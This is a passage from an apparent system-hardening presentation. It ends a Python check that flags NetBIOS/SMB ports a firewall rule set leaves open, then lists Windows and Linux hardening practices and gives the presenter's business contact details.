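    """Return sorted (proto, source, port) triples that the rule set still
    allows inbound to the NetBIOS/SMB ports from the given external sources."""
    findings = []
    for src in probe_sources:
        for port in NETBIOS_SMB_PORTS:
            for proto in ("tcp", "udp"):
                if decide(rules, proto, src, port) == "allow":
                    findings.append((proto, src, port))
    return sorted(findings)


if __name__ == "__main__":
    print("weak rule set leaks:", unfiltered_netbios(parse_rules(WEAK_RULES)))
    print("fixed rule set leaks:", unfiltered_netbios(parse_rules(FIXED_RULES)))
```

Probing the rule set with a source inside the partner range (203.0.113.9) as well as a random internet address is what exposes the ordering bug; a check that only used one source would have passed the weak configuration.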

Other practices include:

- Delete unused scripts and sample applications
- Delete default hidden shares
- Use a different naming scheme and passwords for public interfaces
- Be careful of default permissions
- Use appropriate packet-filtering techniques
- Use available tools to assess system security
- Disable the Guest account
- Rename (or disable) the default Administrator account
- Make sure there are no accounts with blank passwords
- Use Windows group policies
- Develop a comprehensive security awareness program
- Keep up with emerging threats
- Patch not only the OS, but the applications too

Linux can be made more secure

- Awareness of vulnerabilities
- Keep current on new releases and fixes
- Many versions are available
  - Differences ranging from slight to major
- It’s important to understand the basics
  - Run control and service configuration
  - Directory structure and file system
  - Basic shell commands and scripting
  - Package management

Contact Details:

Name: Engr. Effiong Ndarake Effiong
Organization: Efficacy Technologies Limited
Website: www.efficacytech.org; www.efficacytech.net; www.efficacytech.com
Email Address: [email protected]
Phone Number: +2348067856536; +2347087889898
Location: AL 2 Kudenda Road, Nassarawa, Kaduna, Kaduna State, Nigeria

To catch a thief you must think like one, not necessarily become one.



Thank you!!!
